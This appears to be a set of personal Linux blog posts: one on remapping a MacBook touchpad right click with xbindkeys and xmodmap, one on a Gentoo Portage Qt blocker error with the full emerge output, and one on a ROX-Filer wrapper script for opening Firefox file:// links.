The problem with this setup is that I used to have a lot of accidental double tappings while scrolling with two fingers horizontally or vertically. This of course produced unwanted right clicks.

I wanted a solution where I could somehow get a right click the way Mac OS X does it, using ctrl+tap/ctrl+click. I found a solution that emulated ctrl+click as a right click, but then many applications started misbehaving. Firefox for example uses ctrl+click on Linux to open a link in a new tab; when I used ctrl+click as a right click, Firefox stopped opening the links. So I went to plan B.

CMD key(apple key)-click as a right click.

To achieve that:
a) install xvkbd.
Debian: apt-get install xvkbd
Gentoo: emerge xvkbd
b) install xbindkeys.
Debian: apt-get install xbindkeys
Gentoo: emerge xbindkeys
c) create the default .xbindkeysrc file: xbindkeys --defaults > ~/.xbindkeysrc
d) edit it and put the following inside:
"xvkbd -text '\m3'"
  mod4 + b:1 (mouse)

e) edit xorg.conf and set this: Option "TapButton2" "0"
This effectively disables double tapping as a right click.
f) restart X
g) open a terminal and start xbindkeys from it: $ xbindkeys -n -v
Now press CMD key and tap the touchpad or click the touchpad button. You should be greeted with a fresh right click!

If all went well put xbindkeys in your DE’s autostart.

The following works flawlessly on XFCE/LXDE. CMD-click or CMD-tap opens XFCE’s menu or LXDE’s desktop menu.

On fluxbox though there is still a problem. It’s very common for fluxbox key config to look something like the following:
OnDesktop Mouse1 :hideMenus
OnDesktop Mouse2 :workspaceMenu
OnDesktop Mouse3 :rootMenu
OnDesktop Mouse4 :nextWorkspace
OnDesktop Mouse5 :prevWorkspace

So to open the RootMenu, which is the basic menu with the application shortcuts for fluxbox, one needs to actually right click on the Desktop. That worked with TapButton2=3 but it does not work right now. To get around that problem I bound the key left of (1/!), which is normally the (±/§) key on Macs, to the Menu key using xmodmap.
$ cat .xmodmap
keycode 94 = Menu

I never used that key anyway…

I’ve now got my precious right click back without accidental mis-clicks. yihaa!

References: FreeBSD on an Apple MacBook

qt libraries upgrade problem for gentoo

To complement alex’s post upgrading Qt libraries in Gentoo with Portage, here’s what started it all. I wanted to upgrade my kpdf to the most recent version without upgrading world. So the output of emerge -1uDNavt kpdf looked like this:

[ebuild U ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" 6 kB [0]
[nomerge ] app-mobilephone/pysmssend-1.32 USE="qt4" [?]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[ebuild U ] x11-libs/qt-qt3support-4.5.1 [4.4.2] USE="accessibility -custom-cxxflags% -debug -kde% -pch -phonon%" 111,980 kB [0]
[ebuild U ] x11-libs/qt-sql-4.5.1 [4.4.2-r1] USE="iconv qt3support sqlite -custom-cxxflags -debug -firebird -mysql -odbc -pch -postgres" 0 kB [0]
[nomerge ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild N ] virtual/poppler-qt3-0.10.5 0 kB [0]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[ebuild U ] x11-libs/qt-gui-4.5.1 [4.4.2-r3] USE="accessibility dbus glib gtkstyle%* qt3support -cups -custom-cxxflags -debug -mng -nas -nis -pch -raster% -tiff -xinerama" INPUT_DEVICES="(-wacom%)" 0 kB [0]
[ebuild U ] x11-libs/qt-script-4.5.1 [4.4.2] USE="iconv%* -custom-cxxflags% -debug -pch" 0 kB [0]
[ebuild U ] x11-libs/qt-dbus-4.5.1 [4.4.2] USE="-custom-cxxflags -debug -pch" 0 kB [0]
[nomerge ] dev-python/PyQt4-4.4.4-r2 USE="X dbus opengl qt3support svg -debug -doc -examples -webkit" [0]
[nomerge ] x11-libs/qt-svg-4.4.2 USE="-debug -pch" [0]
[blocks b ] >x11-libs/qt-script-4.4.2-r9999 (">x11-libs/qt-script-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-dbus-4.4.2-r9999 (">x11-libs/qt-dbus-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[nomerge ] sys-boot/unetbootin-319 [0]
[nomerge ] x11-libs/qt-gui-4.5.1 [4.4.2-r3] USE="accessibility dbus glib gtkstyle%* qt3support -cups -custom-cxxflags -debug -mng -nas -nis -pch -raster% -tiff -xinerama" INPUT_DEVICES="(-wacom%)" [0]
[blocks b ] [nomerge ] x11-libs/qt-svg-4.4.2 USE="-debug -pch" [0]
[blocks b ] >x11-libs/qt-qt3support-4.4.2-r9999 (">x11-libs/qt-qt3support-4.4.2-r9999" is blocking x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-core-4.4.2-r9999 (">x11-libs/qt-core-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2)
[blocks b ] >x11-libs/qt-sql-4.4.2-r9999 (">x11-libs/qt-sql-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks b ] >x11-libs/qt-gui-4.4.2-r9999 (">x11-libs/qt-gui-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[ebuild U ] x11-libs/qt-test-4.5.1 [4.4.2] USE="iconv%* -custom-cxxflags% -debug -pch" 0 kB [0]
[ebuild U ] x11-libs/qt-core-4.5.1 [4.4.2-r2] USE="glib iconv qt3support ssl -custom-cxxflags -debug -doc -pch" 0 kB [0]
[nomerge ] kde-base/kpdf-3.5.10-r1 [3.5.9] USE="-debug (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild U ] kde-base/kdeprint-3.5.10 [3.5.9] USE="kdehiddenvisibility -cups -debug -kde (-arts%) (-kdeenablefinal%) (-xinerama%)" 0 kB [0]
[nomerge ] app-text/epdfview-0.1.6-r1 USE="-cups -nls -test" [0]
[nomerge ] virtual/poppler-glib-0.10.5 USE="cairo" [0]
[nomerge ] app-text/poppler-bindings-0.10.5-r1 USE="cairo gtk qt3 qt4 -test" [0]
[nomerge ] app-text/poppler-0.10.5-r1 USE="-doc" [0]
[ebuild U ] media-libs/openjpeg-1.3-r2 [1.3] USE="-tools" 0 kB [0]
[nomerge ] kde-base/kdeprint-3.5.10 [3.5.9] USE="kdehiddenvisibility -cups -debug -kde (-arts%) (-kdeenablefinal%) (-xinerama%)" [0]
[ebuild U ] app-text/enscript-1.6.4-r4 [1.6.4-r3] USE="-nls -ruby" 1,013 kB [?=>0]
[nomerge ] app-pda/msynctool-0.21 [0]
[nomerge ] app-pda/libopensync-0.21 USE="-debug -doc -python" [0]
[ebuild U ] dev-db/sqlite-3.6.13 [3.6.11] USE="threadsafe -debug -doc -soundex -tcl" 0 kB [0]
[blocks B ]
[blocks B ] >x11-libs/qt-test-4.4.2-r9999 (">x11-libs/qt-test-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-script-4.4.2-r9999 (">x11-libs/qt-script-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-dbus-4.4.2-r9999 (">x11-libs/qt-dbus-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ]
[blocks B ] [blocks B ] [blocks B ] [blocks B ] >x11-libs/qt-qt3support-4.4.2-r9999 (">x11-libs/qt-qt3support-4.4.2-r9999" is blocking x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ]
[blocks B ] [blocks B ] >x11-libs/qt-core-4.4.2-r9999 (">x11-libs/qt-core-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2)
[blocks B ]
[blocks B ] >x11-libs/qt-sql-4.4.2-r9999 (">x11-libs/qt-sql-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-gui-4.4.2-r3, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ] >x11-libs/qt-gui-4.4.2-r9999 (">x11-libs/qt-gui-4.4.2-r9999" is blocking x11-libs/qt-xmlpatterns-4.4.2, x11-libs/qt-script-4.4.2, x11-libs/qt-dbus-4.4.2, x11-libs/qt-sql-4.4.2-r1, x11-libs/qt-qt3support-4.4.2, x11-libs/qt-svg-4.4.2, x11-libs/qt-test-4.4.2, x11-libs/qt-opengl-4.4.2, x11-libs/qt-core-4.4.2-r2)
[blocks B ]
Total: 13 packages (12 upgrades, 1 new), Size of downloads: 112,998 kB
Conflict: 23 blocks (16 unsatisfied)
Portage tree and overlays:
[0] /usr/portage
[?] indicates that the source repository could not be determined
* Error: The above package list contains packages which cannot be
* installed at the same time on the same system.
('installed', '/', 'x11-libs/qt-svg-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-svg-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge') pulled in by
>=x11-libs/qt-gui-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'sys-boot/unetbootin-319', 'nomerge')
(and 4 more)
('ebuild', '/', 'x11-libs/qt-test-4.5.1', 'merge') pulled in by
x11-libs/qt-test:4 required by ('installed', '/', 'app-text/poppler-bindings-0.10.5-r1', 'nomerge')
('ebuild', '/', 'x11-libs/qt-qt3support-4.5.1', 'merge') pulled in by
~x11-libs/qt-qt3support-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge')
>=x11-libs/qt-qt3support-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-opengl-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-opengl-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('ebuild', '/', 'x11-libs/qt-dbus-4.5.1', 'merge') pulled in by
~x11-libs/qt-dbus-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-gui-4.5.1', 'merge')
>=x11-libs/qt-dbus-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-core-4.4.2-r2', 'nomerge') pulled in by
~x11-libs/qt-core-4.4.2 required by ('installed', '/', 'x11-libs/qt-script-4.4.2', 'nomerge')
x11-libs/qt-core required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-core:4[qt3support] required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
(and 7 more)
('installed', '/', 'x11-libs/qt-dbus-4.4.2', 'nomerge') pulled in by
>=x11-libs/qt-dbus-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
~x11-libs/qt-dbus-4.4.2 required by ('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge')
('installed', '/', 'x11-libs/qt-qt3support-4.4.2', 'nomerge') pulled in by
~x11-libs/qt-qt3support-4.4.2 required by ('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge')
>=x11-libs/qt-qt3support-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
('installed', '/', 'x11-libs/qt-xmlpatterns-4.4.2', 'nomerge') pulled in by
x11-libs/qt-xmlpatterns:4 required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
('installed', '/', 'x11-libs/qt-gui-4.4.2-r3', 'nomerge') pulled in by
>=x11-libs/qt-gui-4.4.2:4 required by ('installed', '/', 'dev-python/PyQt4-4.4.4-r2', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'media-video/vlc-0.9.8a', 'nomerge')
x11-libs/qt-gui required by ('installed', '/', 'sys-boot/unetbootin-319', 'nomerge')
(and 6 more)
('ebuild', '/', 'x11-libs/qt-core-4.5.1', 'merge') pulled in by
~x11-libs/qt-core-4.5.1[qt3support,-debug] required by ('ebuild', '/', 'x11-libs/qt-sql-4.5.1', 'merge')
x11-libs/qt-core:4[qt3support] required by ('installed', '/', 'app-admin/keepassx-0.4.0', 'nomerge')
~x11-libs/qt-core-4.5.1[-debug] required by ('ebuild', '/', 'x11-libs/qt-script-4.5.1', 'merge')
(and 7 more)

The output is also at: http://dpaste.com/52703/
Unless you are a Gentoo Developer there is no easy way to understand the output.
So I joined #gentoo-el on Freenode to ask the greek gentoo developers (hwoarang, deathwing00, tampakrap, wired, yngwin), which happen to be on QT/KDE herds, to explain to me what’s wrong.
I was suggested to run an emerge -uDavt world to upgrade my whole system, but that’s not what I wanted and I asked for a solution that would not involve upgrading the whole system. The following is the output of emerge -uDNavt world:

http://pastebin.com/m8371430

Then they explained to me that there has been a change on QT eclass to provide protection to the system from having mixed QT versions. The problem is that the protection works by blocking the mix, but the output is at least “unfriendly”.

The solution, as alex said is to do: emerge -av1 `eix -I --only-names x11-libs/qt-`

Even though eix is a standard tool every gentoo user has probably installed, I don’t really like the solution because it depends on using another extra program, eix, and not pure portage techniques. Portage should be able, somehow, to handle these dependency problems and provide a custom error when such a problem occurs. The errors on “-9999” versions need vast improvement.

I hope Gentoo devs do something about improving portage even more :)

*EDIT*
After a small conversation with alex, I completely unmerged my x11-libs/qt-4.X package. As it seems it’s not needed at all any longer since all programs correctly reference the x11-libs/qt-NAME-4.X.

lifesaving ROX tip, open file:// urls

Firefox has the feature of keeping links to downloaded files as urls using the file:// pattern. For example: file:///home/user/downloads/test.zip. If you choose ROX-Filer (/usr/bin/rox) to open these files you will get an error:

File doesn’t exist, or I can’t access it: file:///home/user/downloads/test.zip

One way to correct the error is to follow the instructions of http://lovingthepenguin.blogspot.com/2008/08/use-rox-filer-to-open-containing.html

Another way for Gentoo users, and a much more proper one I guess, is to use /usr/bin/roxuri. roxuri is actually a shell script that uses the “-U” option of ROX:

-U, --url=URL open file or directory in URI form

For the non-Gentoo users, /usr/bin/roxuri is:
#!/bin/sh
exec "/usr/lib/rox/ROX-Filer/AppRun" -U "$@"

Create it and make it executable.

Go to Firefox Preferences/Applications/Content Type -> file and select /usr/bin/roxuri as the default application.

Now files from firefox downloads are handled correctly by rox which uses the proper applications to open them and containing folders open up with ROX-Filer. That means that while “file” is handled by roxuri, a .pdf will be opened by epdfview or whatever else you have chosen ROX to open pdf files with.

Both solutions work on ROX version 2.8.